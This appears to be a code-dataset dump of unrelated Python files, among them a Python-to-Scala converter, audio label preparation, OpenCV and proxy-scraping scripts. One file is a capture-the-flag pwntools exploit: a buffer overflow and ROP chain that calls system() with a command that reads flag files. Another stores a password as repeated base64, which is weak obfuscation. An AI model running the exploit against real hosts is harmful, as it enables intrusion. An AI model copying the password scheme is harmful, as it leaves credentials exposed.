indents += [Indent(len(lines), len(lines) + (bigline or "").count('\n'),
zero_mismatch_indent, "scala")]
# Error recovery. If we see a Python block opening, and we're not in
# a continued quote, and we were inside a parened or bracketed expr,
# something is probably wrong, so reset paren count.
if not old_openquote and old_paren_mismatch > 0 and \
re.match(r' *(if|for|with|while|try|elif|else|except|def|class) +.*:.*$',
line):
# Can happen, e.g., if // is used in Python to mean "integer division"
# but we interpret it as a comment (so a closing paren gets ignored),
# or other circumstances where we got confused or the user actually
# messed up their parens
warning("Apparent unmatched left-paren somewhere before, possibly line %d, we might be confused" % zero_mismatch_lineno)
# Reset to only mismatched parens on this line
paren_mismatch = paren_mismatch - old_paren_mismatch
if paren_mismatch < 0:
paren_mismatch = 0
# Restart the logical line, add any old line to lines[]
add_bigline(bigline)
bigline = line
old_bigline = oldline
# Skip to next line if this line doesn't really end
if paren_mismatch > 0 or openquote:
continue
# Remove self and cls parameters from def(), if called for
# Note that we changed 'self' to 'this' above
if options.remove_self:
m = re.match(r'^(\s*def\s+[A-Za-z0-9_]+\s*)\((?:\s*(?:this|cls)\s*)(\)|, *)(.*)$', bigline)
if m:
if m.group(2) == ')':
bigline = '%s()%s' % (m.group(1), m.group(3))
else:
bigline = '%s(%s' % (m.group(1), m.group(3))
if re.match(r'^ *def +__init__\(', bigline):
warning("Need to convert to Scala constructor: %s" % bigline)
######### Handle blocks.
front, body, back = "", "", ""
frontbody = bigline
# Look for a Python statement introducing a block. Split off leading
# indentation and trailing spaces.
m = re.match(r'(\s*)(.*?)\s*:\s*$', frontbody, re.S)
if m:
front, body = m.groups()
else:
splits = re.split(r'(#|//)', line, 1)
if len(splits) == 3:
frontbody = splits[0]
newback = splits[1] + splits[2]
m = re.match(r'''(\s*)([^\'\"]*?)\s*:\s*$''', frontbody, re.S)
if m:
front, body = m.groups()
back = " " + newback
# FIXME: Don't yet handle single-line if statements, e.g. 'if foo: bar'
# Check for def/class and note function arguments. We do this separately
# from the def check below so we find both def and class, and both
# Scala and Python style.
m = re.match('\s*(def|class)\s+(.*?)(?:\((.*)\))?\s*(:\s*$|=?\s*\{ *$|extends\s.*|with\s.*|\s*$)', bigline, re.S)
if m:
(ty, name, allargs, coda) = m.groups()
argdict = {}
# In Python class foo(bar): declarations, bar is a superclass, not
# parameters. If Scala the equivalent decls are parameters, just like
# functions in both languages.
python_style_class = ty == 'class' and coda and coda[0] == ':'
if not python_style_class and allargs and allargs.strip():
args = allargs.strip().split(',')
# Strip off default assignments
args = [x.strip().split('=')[0].strip() for x in args]
# Strip off Scala types
args = [x.strip().split(':')[0].strip() for x in args]
for arg in args:
if arg.startswith("var "):
argdict[arg[4:].strip()] = "var"
elif arg.startswith("val "):
argdict[arg[4:].strip()] = "val"
else:
argdict[arg] = "val"
defs += [Define(ty, name, argdict)]
#debprint("Adding args %s for function", argdict)
# Check for various types of blocks, and substitute.
# We only want to check once per line, and Python
# unfortunately makes it rather awkward to do convenient if-then checks
# with regexps because there's no equivalent of
#
# if ((m = re.match(...))):
# do something with m.groups()
# elif ((m = re.match(...))):
# etc.
#
# Instead you need assignment and check on separate lines, and so all
# ways of chaining multiple regex matches will be awkward. We choose
# to create an infinite loop and break after each match, or at the end.
# This almost directly mirrors the architecture of a C switch() statement.
#
newblock = None
while True:
if body:
# Check for def
m = re.match('def\s+(.*?)\((.*)\)$', body, re.S)
if m:
newblock = "def %s(%s)" % m.groups()
break
# Check for 'for' statement
m = re.match('for\s+(.*?)\s+in\s+(.*)$', body, re.S)
if m:
newblock = "for (%s <- %s)" % m.groups()
break
# Check for 'if' statement
m = re.match('if\s+(.*)$', body, re.S)
if m:
newblock = "if (%s)" % m.groups()
break
# Check for 'elif' statement
m = re.match('elif\s+(.*)$', body, re.S)
if m:
newblock = "else if (%s)" % m.groups()
break
# Check for 'else' statement
m = re.match('else\s*$', body, re.S)
if m:
newblock = "else"
break
# Check for 'while' statement
m = re.match('while\s(.*)$', body, re.S)
if m:
newblock = "while (%s)" % m.groups()
break
# Check for 'try' statement
m = re.match('try\s*$', body, re.S)
if m:
newblock = "try"
break
# Check for bare 'except' statement
m = re.match('except\s*$', body, re.S)
if m:
newblock = "catch"
break
# Check for 'except' statement
# FIXME: Should convert to a case statement within the body
m = re.match('except\s+(.*)$', body, re.S)
if m:
newblock = "catch %s" % m.groups()
break
# Check for 'finally' statement
m = re.match('finally\s*$', body, re.S)
if m:
newblock = "finally"
break
# Check for 'class(object)' statement
# Class that inherits from `object' (new-style class), convert to
# class without superclass
m = re.match('class\s+(.*)\(object\)', body, re.S)
if m:
newblock = "class %s" % m.groups()
break
# Check for 'class(superclass)' statement
m = re.match('class\s+(.*)\((.*)\)$', body, re.S)
if m:
newblock = "class %s extends %s" % m.groups()
break
# Check for 'class' statement (no superclass)
m = re.match('class\s+([^(]*)$', body, re.S)
if m:
newblock = "class %s" % m.groups()
break
# Check for assignments and modifying assignments (e.g. +=) to variables
# inside of functions. Add val/var to bare assignments to variables not
# yet seen. Initially we add 'val', but if we later see the variable
# being reassigned or modified, we change it to 'var'. Also look for
# self.* variables, but handle them differently. For one,
# they logically belong to the class, not the function they're in,
# so we need to find the right dictionary to store them in. Also,
# we don't add 'val' or 'var' to them unless we see them in __init__(),
# and in that case we move them outside the __init__() so they end up
# in class scope. Existing variables at class scope get moved to
# companion objects. (Note the following: Variables declared at class
# scope are instance variables in Scala, but class variables in Python.
# Instance variables in Python are set using assignments to self.*;
# class variables in Scala are stored in a companion object.)
#debprint("About to check for vars, line %d, fun %s",
# lineno, defs and defs[-1].name)
if defs and paren_mismatch == 0:
# Retrieve most recent def/class definition
dd = defs[-1]
#debprint("Checking for vars, line %d, old_bigline[%s], bigline[%s]", lineno, old_bigline, bigline)
# We might have removed a 'self.' from a variable assignment, if
# --remove-self was given. But we want to know whether the assignment
# was a self.* variable. So we first look for an assignment in the
# unfrobbed line, and if so, retrieve the variable name, and then
# look at the frobbed line to get everything else (in particular,
# the RHS, which might have been frobbed).
assignre = re.compile('(\s*)(val\s+|var\s+|)((?:self\.|cls\.)?[a-zA-Z_][a-zA-Z_0-9]*)(\s*[+\-*/]?=)(.*)', re.S)
m = assignre.match(old_bigline)
if m:
(_, _, varvar, _, _) = m.groups()
m = assignre.match(bigline)
if m:
(newindent, newvaldecl, _, neweq, newrhs) = m.groups()
#debprint("lineno: %d, Saw var: %s", lineno, varvar)
is_self = varvar.startswith("self.") or varvar.startswith("cls.")
# An assignment rather than a += or whatever
is_assign = neweq.strip() == '='
# If this a Python-style variable assignment at class level? If so,
# it's a class var, and we will move it to the companion object
is_new_class_var = (not newvaldecl and is_assign and
dd.ty == 'class' and not is_self)
# If a class var, give it a 'cls.' prefix in the variable-assignment
# dictionary, so we can match later refs to the var. After this,
# 'varvar' is the name of the var as recorded in the vardict, but
# 'orig_varvar' is the actual name of the var in the text of the
# program.
orig_varvar = varvar
if is_new_class_var:
varvar = 'cls.' + varvar
# Don't add var/val to a self.foo assignment unless it's in an
# __init__() method (in which case it gets moved to class scope)
ok_to_var_self = is_self and dd.ty == 'def' and dd.name == '__init__'
curvardict = dd.vardict
if is_self:
# For a self.* variable, find the class vardict instead of the
# vardict of the current function.
i = len(defs) - 1
while i > 0 and defs[i].ty != 'class':
i -= 1
curvardict = defs[i].vardict
if newvaldecl:
# The text had an explicit var/val decl (Scala-style)
if varvar in curvardict:
warning("Apparent redefinition of variable %s" % varvar)
else:
# Signal not to try and change val to var
curvardict[varvar] = "explicit"
else:
# This is a Python-style variable (no declaration), or Scala-style
# assignment to existing variable.
#debprint("varvar: %s, curvardict: %s", varvar, curvardict)
if varvar not in curvardict:
if not is_assign:
# We saw 'foo += 1' or similar, but no previous assignment
# to 'foo'.
warning("Apparent attempt to modify non-existent variable %s" % varvar)
else:
# First time we see an assignment. Convert to a Scala
# declaration and record the number. We convert it to 'val',
# but we may go back later and change to 'var'.
curvardict[varvar] = len(lines)
if not is_self or ok_to_var_self:
bigline = "%sval %s%s%s%s" % (newindent, newvaldecl, orig_varvar, neweq, newrhs)
else:
# Variable is being reassigned, so change declaration to 'var'.
vardefline = curvardict[varvar]
if vardefline == "val":
warning("Attempt to set function parameter %s" % varvar)
elif type(vardefline) is int:
#debprint("Subbing var for val in [%s]", lines[vardefline])
lines[vardefline] = re.sub(r'^( *)val ', r'\1var ',
lines[vardefline])
if is_new_class_var:
# Bare assignment to variable at class level, without 'var/val'.
# This is presumably a Python-style class var, so move the
# variable (and preceding comments) to the companion object,
# creating one if necessary.
if dd.compobj_lineind is None:
# We need to create a companion object.
lines[dd.lineind:dd.lineind] = \
['%sobject %s {' % (' '*dd.indent, dd.name),
'%s}' % (' '*dd.indent),
'']
# This should adjust dd.lineind up by 3!
old_lineind = dd.lineind
adjust_lineinds(dd.lineind, 3)
assert dd.lineind == old_lineind + 3
dd.compobj_lineind = dd.lineind - 2
# Now move the variable assignment itself.
inslines = bigline.split('\n')
inspoint = dd.compobj_lineind
lines[inspoint:inspoint] = inslines
adjust_lineinds(inspoint, len(inslines))
curvardict[varvar] = inspoint
# Also move any blank or comment lines directly before.
bcomcount = zero_mismatch_prev_blank_or_comment_line_count
#debprint("Moving var %s, lineno=%s, bcomcount=%s",
# varvar, lineno, bcomcount)
if bcomcount > 0:
lines[inspoint:inspoint] = (
lines[-bcomcount:])
adjust_lineinds(inspoint, bcomcount)
del lines[-bcomcount:]
adjust_lineinds(len(lines)+1, -bcomcount)
bigline = None
if ok_to_var_self and bigline.strip().startswith('val '):
# If we've seen a self.* variable assignment in an __init__()
# function, move it outside of the init statement, along with
# any comments.
bigline = ' '*dd.indent + bigline.lstrip()
inslines = bigline.split('\n')
inspoint = dd.lineind
lines[inspoint:inspoint] = inslines
adjust_lineinds(inspoint, len(inslines))
if type(curvardict[varvar]) is int:
curvardict[varvar] = inspoint
bcomcount = zero_mismatch_prev_blank_or_comment_line_count
if bcomcount > 0:
# Move comments, but beforehand fix indentation
for i in xrange(bcomcount):
lines[-(i+1)] = re.sub(r'^( *)', ' '*dd.indent, lines[-(i+1)])
lines[inspoint:inspoint] = (
lines[-bcomcount:])
adjust_lineinds(inspoint, bcomcount)
del lines[-bcomcount:]
adjust_lineinds(len(lines)+1, -bcomcount)
bigline = None
break
# Store logical line or modified block-start line into lines[]
if bigline is None:
continue
if newblock:
startind = len(lines)
add_bigline(front + newblock + back)
indents += [Indent(startind, len(lines)-1, bigline_indent, "python")]
else:
add_bigline(bigline)
bigline = None
# At the end, output all lines
for line in lines:
print line
# Ignore blank line for purposes of figuring out indentation
# NOTE: No need to use \s* in these or other regexps because we call
# expandtabs() above to convert tabs to spaces, and rstrip() above to
# remove \r and \n
|
12,472 | 97490c9cd1108543f9ad3e0a0f3135697d111509 | # Module for preparing training labels,
# may also be run directly as a script
# Author: Nick Wilkinson 2021
import argparse
import numpy as np
import pandas as pd
import os
from voxseg import utils
def get_labels(data: pd.DataFrame, frame_length: float = 0.32, rate: int = 16000) -> pd.DataFrame:
    '''Prepare per-frame training labels for every utterance in the dataset.

    Args:
        data: A pd.DataFrame with dataset information and signals -- see docs for prep_data().
        frame_length (optional): Length of a spectrogram feature in seconds. Default is 0.32.
        rate (optional): Sample rate in Hz. Default is 16k.

    Returns:
        A pd.DataFrame with a 'labels' column of per-frame label arrays plus metadata.
        Rows whose signal was too short to yield any frame are dropped.
    '''
    # Work on a copy so the caller's DataFrame is left untouched.
    frame = data.copy()
    print('------------ Generating training labels -----------')
    # One label array per utterance; too-short signals yield None here.
    frame['labels'] = frame.apply(
        lambda row: _generate_label_sequence(row, frame_length, rate), axis=1)
    # Raw audio and the single per-utterance label are no longer needed.
    frame = frame.drop(['signal', 'label'], axis=1)
    # dropna() discards utterances that produced no frames (labels is None).
    return frame.dropna().reset_index(drop=True)
def one_hot(col: pd.Series) -> pd.Series:
    '''Convert string label sequences to one-hot encoded label sequences.

    One-hot positions are assigned in alphabetical order of the string labels,
    eg. {a: [1, 0, 0], b: [0, 1, 0], c: [0, 0, 1]}.

    Args:
        col: A column of a pd.DataFrame containing label sequences generated by get_labels().

    Returns:
        A pd.Series containing the label sequences converted to one-hot encoding.
    '''
    # np.unique sorts, which fixes the alphabetical column order.
    classes = np.unique(np.hstack(col))
    # Row i of the identity matrix is the one-hot vector for class i.
    identity = np.eye(len(classes))
    label_map = {label: identity[i] for i, label in enumerate(classes)}
    return col.apply(lambda seq: np.array([label_map[label] for label in seq]))
def prep_data(path: str) -> pd.DataFrame:
    '''Build a pd.DataFrame of dataset information from a Kaldi-style data
    directory containing 'wav.scp', 'segments' and 'utt2spk'.

    Args:
        path: The path to the data directory.

    Returns:
        A pd.DataFrame of dataset information. For example:

            recording-id extended filename  utterance-id  start  end  label       signal
        0   rec_00       ~/Documents/test_00.wav  utt_00  10     20   speech      [-49, -43, -35...
        1   rec_00       ~/Documents/test_00.wav  utt_01  50     60   non_speech  [-35, -23, -12...
        2   rec_01       ~/Documents/test_01.wav  utt_02  135    163  speech      [25, 32, 54...
    '''
    wav_scp, segments, utt2spk = utils.process_data_dir(path)
    # Labels require segment boundaries and speaker (label) assignments.
    assert utt2spk is not None and segments is not None, \
        'ERROR: Data directory needs to contain \'segments\' and \'utt2spk\'\
        containing label information.'
    # Join the three tables on their shared ids, then rename the speaker
    # column to 'label' and attach the raw audio signals.
    merged = wav_scp.merge(segments).merge(utt2spk)
    merged = merged.rename(columns={"speaker-id": "label"})
    return merged.merge(utils.read_sigs(merged))
def _generate_label_sequence(row: pd.DataFrame, frame_length: float, rate: int) -> np.ndarray:
    '''Auxiliary function used by get_labels(). Generates the per-frame label
    array for one row of the pd.DataFrame created by prep_data().

    Args:
        row: A single dataset row holding 'signal', 'label' and an id column.
        frame_length: Length of a spectrogram feature in seconds.
        rate: Sample rate in Hz.

    Returns:
        An np.ndarray of labels (the row's label repeated once per frame), or
        None when the signal is too short to produce a single frame -- the
        caller drops such rows with dropna().
    '''
    sig = row['signal']
    # Prefer the utterance id for progress display; fall back to recording id.
    utt_id = row['utterance-id'] if 'utterance-id' in row else row['recording-id']
    # Frame start positions; computed once instead of twice as before
    # (the original evaluated the same range() expression for the length
    # check and again for iteration).
    starts = range(0, int(len(sig) - 1 - (frame_length + 0.01) * rate), int(frame_length * rate))
    if len(starts) == 0:
        # Signal shorter than one frame: no labels for this row.
        return None
    # progressbar() is display-only; each frame gets the utterance's label.
    labels = [row['label'] for _ in utils.progressbar(starts, utt_id)]
    return np.array(labels)
# Handle args when run directly as a script: read a Kaldi-style data dir,
# build one-hot frame labels, and save them to <out_dir>/labels.h5.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(prog='prep_labels.py',
                                     description='Prepare labels for model training.')
    parser.add_argument('data_dir', type=str,
                        help='a path to a Kaldi-style data directory containing \'wav.scp\', \'segments\', and \'utt2spk\'')
    parser.add_argument('out_dir', type=str,
                        help='a path to an output directory where labels and metadata will be saved as labels.h5')
    args = parser.parse_args()

    data = prep_data(args.data_dir)
    labels = get_labels(data)
    labels['labels'] = one_hot(labels['labels'])
    if not os.path.exists(args.out_dir):
        print(f'Directory {args.out_dir} does not exist, creating it.')
    # makedirs creates intermediate directories too (os.mkdir failed when
    # out_dir was nested under a non-existent parent); exist_ok avoids a
    # race if the directory appears between the check and the creation.
    os.makedirs(args.out_dir, exist_ok=True)
    utils.save(labels, f'{args.out_dir}/labels.h5')
12,473 | d8b836c796a311da7fb7f4ecafce0b60cfcf6e7e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import * # pip install pwntools
context.arch = "amd64"
key = randoms(8)
def checksum(data):
    """Return the XOR of all byte values of *data* (single-byte checksum)."""
    acc = 0
    for code in map(ord, data):
        acc ^= code
    return acc
def Send(data):
    """Frame *data* in the service's wire format and send it.

    Layout: u32 total length | 8-byte session key | data | NUL | 1-byte
    XOR checksum over key+data.
    """
    packet = p32(len(data) + 10) + key
    packet += data + "\x00"
    packet += chr(checksum(key + data))
    r.send(packet)
def Recv():
    """Read one framed reply: u32 length, then the body; strip the 8-byte
    key prefix and the trailing checksum/NUL byte."""
    length = u32(r.recv(4))
    payload = r.recv(length)
    return payload[8:-1]
# NOTE(review): the REMOTE flag selects the raw-IP endpoint while the default
# is the ctfcompetition.com host -- the two look swapped; confirm intent.
if args.REMOTE:
    r = remote("35.233.98.21", 4242)
else:
    r = remote("mlwr-part1.ctfcompetition.com", 1234)

# Overflow filler: 1320 bytes of padding, then a terminator.
data = "A" * 1320 + "\0"

context.log_level = 'debug'
# print(sys.argv[1])
# Hand-built packet: claimed length 8, session key, then the oversized body
# that smashes the stack (deliberately bypasses Send()'s checksum framing).
p = p32(8) + key + data
p += '\x00' * 7
# p += p64(0x404166) * 8
p += p64(0) * 3
# Gadgets found in the target binary:
# 0x40a101 : pop rax ; pop rcx ; pop rdx ; pop rsi ; pop rdi ; call rax
# 0x0000000000408108 : pop rax ; ret
# 0x0000000000400b18 : pop rbp ; ret
# 0x00000000004093e1 : mov qword ptr [rbp - 0x10], rax ; mov rax, qword ptr [rbp - 0x10] ; shr rax, 0x20 ; xor eax, dword ptr [rbp - 4] ; pop rbp ; ret
# 0x400A81, # rax = send
pop_rax = 0x408108
pop_rbp = 0x400b18
pop_rdi = 0x000000000040aeb3
pop_rsi_15 = 0x000000000040aeb1
set_b = 0x4093e1            # write-what-where: stores rax at [rbp-0x10]
buf = 0x60c800              # scratch buffer in the binary's data segment
get = 0x4097fa
dynamic = 0x40a0e7
# Leaked libc pointer minus its known offset -- presumably from a prior leak
# of this exact remote instance; TODO confirm it is still valid.
libc_base = 0x7f1b8014f630 - 0x20630
system = libc_base + 0x41100
# ROP chain: write the shell command into `buf` 8 bytes at a time via the
# set_b write gadget, then call system(buf). The command redirects stdout
# to fd 4, cds into the user's home dir, and dumps the flag file.
p += flat(
    pop_rax, "exec 1>&", pop_rbp, buf+0x10, set_b, buf + 0x10 + 8,
    pop_rax, "4;cd /ho", set_b, buf + 0x10 + 8 * 2,
    pop_rax, "me/`whoa", set_b, buf + 0x10 + 8 * 3,
    pop_rax, "mi`;ls -", set_b, buf + 0x10 + 8 * 4,
    pop_rax, "a;cat f*", set_b, buf + 0x10 + 8 * 5,
    pop_rdi, buf,
    system
)
# Earlier, abandoned chain kept for reference:
# p += flat(
#     pop_rax,
#     "system\x00\x00",
#     pop_rbp,
#     buf + 0x10,
#     set_b, buf+8+0x10, # next rbp
#     pop_rax,
#     "ls 1>&4".ljust(8, "\x00"),
#     set_b, 0,
#     pop_rdi, buf,
#     pop_rsi_15, buf + 8, 0,
#     pop_rax, 0,
#     pop_rdi, 0x7f1b8021ce30,
#     pop_rsi_15, buf, 0,
#     # get,
#     # 0x000000000040a105, # pop rdi ; call rax
#     # buf + 8,
#     # dynamic,
#     0x40a101,
#     0x400a81,
#     0, 0x100, buf, 4,
# )
# + p64(0x60c300) + p64(0x408e91)
# Pad the rest of the packet with zero qwords.
# NOTE(review): 0x3200 / 8 is integer division only under Python 2 -- this
# script targets Python 2 pwntools; under Python 3 this line raises.
p += ('\x00' + '\x00' * 7) * (0x3200 / 8)
# p += chr(int(sys.argv[1]))
# p += chr(checksum(key + data))
r.send(p)
r.shutdown()
r.stream() # interactive()
# CTF{~~~APT warz: teh 3mpire pwns b4ck~~~}
|
12,474 | d2d12c328a7a777d935e3ee3a88f6a22c890ab08 | import cv2
# Locate text-like regions in a card template and draw boxes around them.
card = cv2.imread('static/extraCardTemplates/ActionAttack.png')
grayscale = cv2.cvtColor(card, cv2.COLOR_BGR2GRAY)
# Smooth, then adaptively binarise (tune the kernel/threshold constants).
smoothed = cv2.GaussianBlur(grayscale, (5, 5), 0)
binarised = cv2.adaptiveThreshold(smoothed, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 15, 30)
# Grow foreground blobs so neighbouring glyphs merge into single contours.
rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (10, 10))
grown = cv2.dilate(binarised, rect_kernel, iterations=4)
# findContours returns (contours, hierarchy) on OpenCV 4 but
# (image, contours, hierarchy) on OpenCV 3; pick the contour list either way.
found = cv2.findContours(grown, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contours = found[0] if len(found) == 2 else found[1]
# Box every sufficiently large region directly on the original image.
for contour in contours:
    if cv2.contourArea(contour) > 50:
        x, y, w, h = cv2.boundingRect(contour)
        cv2.rectangle(card, (x, y), (x + w, y + h), (36, 255, 12), 2)
cv2.imwrite("suggestions.jpg", card)
|
12,475 | afb8249e7f262c6270ae556ac2910a14267929d3 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 26 12:16:20 2020
@author: chelsea
"""
def load_raw_data(input_folder, save_folder):
    """Load data/time/energy CSVs from *input_folder* into a raw_data object,
    pickle it to <save_folder>/rawdata.pkl, and return it.

    Args:
        input_folder: directory containing 'data.csv', 'time.csv', 'energy.csv'.
        save_folder: directory to write 'rawdata.pkl' into (created if absent).

    Returns:
        The populated Raw_Data_Class.raw_data instance.
    """
    import numpy as np
    from pathlib import Path
    import pickle
    import os
    from Raw_Data_Class import raw_data as RDC

    raw_data = RDC()
    folder = Path(input_folder)
    # Pass paths directly to np.loadtxt: the previous open(...) calls handed
    # loadtxt an already-open handle that was never closed (resource leak).
    data = np.loadtxt(folder / 'data.csv', delimiter=',')
    time = np.loadtxt(folder / 'time.csv', delimiter=',')
    energy = np.loadtxt(folder / 'energy.csv', delimiter=',')

    raw_data.change_value(energy=energy, time=time, data_matrix=data)
    raw_data.load_path = folder

    # makedirs with exist_ok replaces the isdir-check + mkdir pair: it also
    # creates missing parents and is race-free.
    save_dir = Path(save_folder)
    os.makedirs(save_dir, exist_ok=True)
    with open(save_dir / 'rawdata.pkl', 'wb') as f:
        pickle.dump(raw_data, f)

    return raw_data
|
12,476 | b2b2e1843657383b3e9baf3491a1707e7089d3b4 | from __future__ import division
from ..errors import UndefinedDistributionError
from .base import UncertaintyBase
from numpy import repeat, tile
class UndefinedUncertainty(UncertaintyBase):
    """Undefined or unknown uncertainty"""
    # Distribution id used by the uncertainty framework's dispatch tables.
    id = 0
    description = "Undefined or unknown uncertainty"

    @classmethod
    def random_variables(cls, params, size, seeded_random=None):
        # "Sampling" an undefined distribution just repeats the static 'loc'
        # value: each of the params.shape[0] rows becomes a constant row of
        # length `size`. `params` is presumably a structured array with a
        # 'loc' field, one row per parameter -- TODO confirm against
        # UncertaintyBase. `seeded_random` is accepted for interface
        # compatibility but unused (nothing is random here).
        return repeat(params['loc'], size).reshape((params.shape[0],
            size))

    @classmethod
    def cdf(cls, params, vector):
        # A CDF is meaningless without a distribution; fail loudly.
        raise UndefinedDistributionError(
            "Can't calculate percentages for an undefined distribution.")

    @classmethod
    def ppf(cls, params, percentages):
        # Every percentile maps to the static 'loc' value: tile the (n, 1)
        # loc column across the number of requested percentile columns.
        return tile(params['loc'].reshape((params.shape[0], 1)),
            percentages.shape[1])
class NoUncertainty(UndefinedUncertainty):
    """No uncertainty: behaves exactly like UndefinedUncertainty (static
    'loc' values, no sampling), differing only in id and description."""
    id = 1
    description = "No uncertainty"
|
12,477 | aade96e2904344381b47ba20e7f7f1366f6db75e | """
given a string, s, return the "reversed" string where all characters that are
not a letter stay in the same place, and all letters reverse their positions.
example:
input: "ab-cd"
output: "dc-ba"
input: "a-bC-dEF-ghIj"
output: "j-Ih-gfE-dCba"
"""
def reverse_only_chars(s):
# strings are immutable so we need to create an easy way to swap elements (an array)
char_array = []
# store the indices of the characters of the input string
index_array = []
# iterate through the string and populate the two arrays with their values.
for i, char in enumerate(s):
if char.isalpha():
index_array.append(i)
char_array.append(char)
# intialize two pointers for the index_array
i = 0
j = len(index_array) - 1
# iterate through the index array from front and back with two pointers.
# swap the values that the pointers point to in the char_array
while i < j:
low_index = index_array[i]
high_index = index_array[j]
char_array[low_index], char_array[high_index] = char_array[high_index], char_array[low_index]
i+=1
j-=1
# return a string of the reversed character word.
# the non-alpha characters will remain in the same place.
return "".join(char_array)
# Demo inputs. NOTE(review): the first assignment is immediately overwritten
# and never printed -- presumably left over from testing the first example.
s = "ab-cd" # "dc-ba"
s = "a-bC-dEF-ghIj" # "j-Ih-gfE-dCba"
print(reverse_only_chars(s))
|
12,478 | 7fe5ec74f70ce3b4f6721df9e881af19718f8769 | import os
import curses
# Temporarily drop out of the curses UI into a plain bash shell, then
# restore the working directory when the shell exits.
curses.endwin()  # leave curses mode so the terminal behaves normally
startDir = os.getcwd()  # remember where we were so we can come back
os.system("clear")
print(f"To return to the semi-graphical terminal windowing system, type: 'exit'")
os.system("bash")  # blocks until the user exits the subshell
os.chdir(startDir)  # the subshell may have cd'd elsewhere; undo that
|
12,479 | 93d6481146afa1280c17a9131a44b57b9958d96e |
from html.parser import HTMLParser
import random
import time
from GetLocalHtml import getLocalWebHtml
from GetProxyWebHtml import getProxyWebHtml
# Scrape the high-anonymity IPs, ports and protocols from the first three
# pages of the hidemyname proxy list.
def getHidemynameProxies():
    proxyList=[]
    myParser=MyHidemynameParser()
    for hidemynamePage in range(0,3): # scrape pages 1-3 (64 entries per page)
        # html=getLocalWebHtml('hidemynameLocalHtml.txt') # during testing, read a saved local page to avoid hammering the proxy site
        html=getProxyWebHtml('https://www.hidemyname.biz/proxy-list/?type=h&anon=234&start=%s#list'%(hidemynamePage*64))
        myParser.feed(html)
        proxyList.extend(myParser.resultList)
        myParser.resultList=[] # the same parser object is reused, so clear its results after each page
        sleepAwhile('Hide my name代理')
    return proxyList
def sleepAwhile(proxySite):
    """Sleep for a random 3-6 seconds after each page fetch to avoid
    hammering the proxy site's server.

    Args:
        proxySite: display name of the proxy site, used in the log line.
    """
    pause = random.uniform(3, 6)
    print("抓取完成一个《%s》页面,睡眠%s秒" % (proxySite, pause))
    time.sleep(pause)
# HTMLParser subclass that extracts protocol/ip/port triples from a
# hidemyname proxy-list page. In the page's table, the IP sits in a
# <td class="tdl"> cell and the port in the <td> immediately after it.
class MyHidemynameParser(HTMLParser):
    """Collects [ip, port, 'http'] rows into ``resultList`` while feed()ing
    a proxy-list page."""

    def __init__(self):
        # HTMLParser needs its own initialisation before feed() is usable.
        super().__init__()
        # Fix: these four were previously *class* attributes, so every
        # instance (and the class object itself) shared one mutable list --
        # a second parser would silently inherit the first parser's results.
        # They are now per-instance state.
        self.resultList = []  # all [ip, port, protocol] rows seen so far
        self.proxyData = []   # the row currently being assembled
        self.enterIP = 0      # 1 while inside the <td class="tdl"> IP cell
        self.enterPort = 0    # 1 while inside the following port cell

    def handle_starttag(self, tag, attrs):
        # A <td class="tdl"> opens an IP cell; the next plain <td> after an
        # IP cell is the port cell.
        if tag == 'td' and attrs:
            for (key, value) in attrs:
                if key == 'class' and value == 'tdl':
                    self.enterIP = 1
        elif tag == 'td' and self.enterIP == 1:
            self.enterPort = 1

    def handle_endtag(self, tag):
        # Cell boundaries are tracked via start tags only.
        pass

    def handle_data(self, data):
        if self.enterIP == 1 and self.enterPort == 0:
            # Text inside the IP cell.
            self.proxyData.append(data)
        elif self.enterPort == 1:
            # Text inside the port cell completes the row; the listing page
            # only shows HTTP proxies, so the protocol is hard-coded.
            self.proxyData.append(data)
            self.proxyData.append('http')
            self.resultList.append(self.proxyData)
            self.proxyData = []
            self.enterIP = 0
            self.enterPort = 0
# Manual test entry point: scrape and print the proxies.
if __name__=='__main__':
    proxyList=getHidemynameProxies() # only the first three pages are scraped
    for item in proxyList:
        print(item)
    print('done')
12,480 | fefc8456fc6ee7af0bf1915a32441ed717d2b9f5 | import os,sys
import base64
class Directory(object):
    """Manages the ~/.CowNewsReader config directory and the (weakly)
    obfuscated credential file inside it. Python 2 code (print statements,
    ``except E, e`` syntax, ``xrange``)."""

    def startDir(self):
        """Create ~/.CowNewsReader, its images/ subdirectory, and empty
        pref/pwd/read files if any of them are missing."""
        if not os.path.isdir(os.path.expanduser('~') + "/.CowNewsReader"):
            # os.system returns non-zero on failure, which is truthy.
            if os.system("mkdir " + os.path.expanduser('~') + "/.CowNewsReader"):
                print "Error: Couldn't create directory"
                sys.exit(1)
        if not os.path.isdir(os.path.expanduser('~') + "/.CowNewsReader/images"):
            if os.system("mkdir " + os.path.expanduser('~') + "/.CowNewsReader/images"):
                print "Error: Couldn't create directory"
                sys.exit(1)
        if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/pref.txt"):
            os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/pref.txt")
        if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt"):
            os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/pwd.txt")
        if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/read.txt"):
            os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/read.txt")

    def saveUserInfo(self, name, pwd):
        """Write base64-obfuscated credentials to pwd.txt.

        The first character of *name* is stripped before encoding (it is
        re-attached as a literal 'e' in readUserInfo -- presumably the name
        always starts with 'e'; TODO confirm). The password is re-encoded
        (remainder-of-name mod 10) extra times as a trivial obfuscation.
        """
        try:
            f = open(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt", 'w')
            nm = f.softspace
        except IOError, e:
            print e
            sys.exit(0)
        enName = base64.b64encode(name[1:])
        enPwd = base64.b64encode(pwd)
        # Assumes name[1:] decodes to a numeric string -- int() raises
        # otherwise; TODO confirm callers guarantee this.
        pd = int(base64.b64decode(enName))%10
        # NOTE(review): f.softspace is 0 on a freshly opened Python 2 file,
        # so this loop appears never to run -- confirm whether the extra
        # name encoding was ever intended.
        for i in xrange(nm):
            enName = base64.b64encode(enName)
        for i in xrange(pd):
            enPwd = base64.b64encode(enPwd)
        f.write(enName+"\n")
        f.write(enPwd)
        f.close()

    def readUserInfo(self):
